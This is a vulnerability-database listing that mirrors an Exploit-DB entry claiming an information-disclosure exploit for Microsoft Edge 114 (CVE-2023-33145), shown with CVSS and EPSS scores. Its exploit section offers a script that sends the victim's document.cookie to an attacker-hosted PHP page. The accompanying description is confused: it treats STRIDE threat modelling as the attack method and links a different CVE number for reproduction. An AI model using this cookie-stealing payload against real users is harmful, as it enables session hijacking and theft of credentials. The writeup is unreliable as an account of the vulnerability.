Lucene search

K
exploitdbNu11secur1tyEDB-ID:51571
HistoryJul 06, 2023 - 12:00 a.m.

Microsoft Edge 114.0.1823.67 (64-bit) - Information Disclosure

2023-07-0600:00:00
nu11secur1ty
www.exploit-db.com
75
information disclosure
microsoft edge
vulnerability
exploit
stride threat modeling

7.8 High

CVSS3

Attack Vector

LOCAL

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

7.3 High

AI Score

Confidence

High

0.008 Low

EPSS

Percentile

81.5%

## Title:Microsoft Edge 114.0.1823.67 (64-bit) - Information Disclosure
## Author: nu11secur1ty
## Date: 07.06.2023
## Vendor: https://www.microsoft.com/
## Software: https://www.microsoft.com/en-us/edge?form=MA13FJ&exp=e415
## Reference: https://portswigger.net/web-security/information-disclosure,
https://www.softwaresecured.com/stride-threat-modeling/
## CVE-2023-33145



## Description:
The type of information that could be disclosed if an attacker
successfully exploited this vulnerability is data inside the targeted
website like IDs, tokens, nonces, cookies, IP, User-Agent, and other
sensitive information.
The user would have to click on a specially crafted URL to be
compromised by the attacker.
In this example, the attacker use STRIDE Threat Modeling to spoof the
victim to click on his website and done.
This will be hard to detect.

## Conclusion:
Please be careful, for suspicious sites or be careful who sending you
an link to open!

## Staus: HIGH Vulnerability

[+]Exploit:

- Exploit Server:

```js
## This is a Get request from the server when the victims click! And
it is enough to understand this vulnerability! =)

<script> var i = new Image();
i.src="PoCsess.php?cookie="+escape(document.cookie)</script>

## WARNING: The PoCsess.php will be not uploaded for security reasons!
## BR nu11secur1ty

```

## Reproduce:
[href](https://github.com/nu11secur1ty/Windows11Exploits/tree/main/2023/CVE-2023-33146)

## Proof and Exploit
[href](https://www.nu11secur1ty.com/2023/07/cve-2023-33145-microsoft-edge.html)

## Time spend:
01:30:00

7.8 High

CVSS3

Attack Vector

LOCAL

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

7.3 High

AI Score

Confidence

High

0.008 Low

EPSS

Percentile

81.5%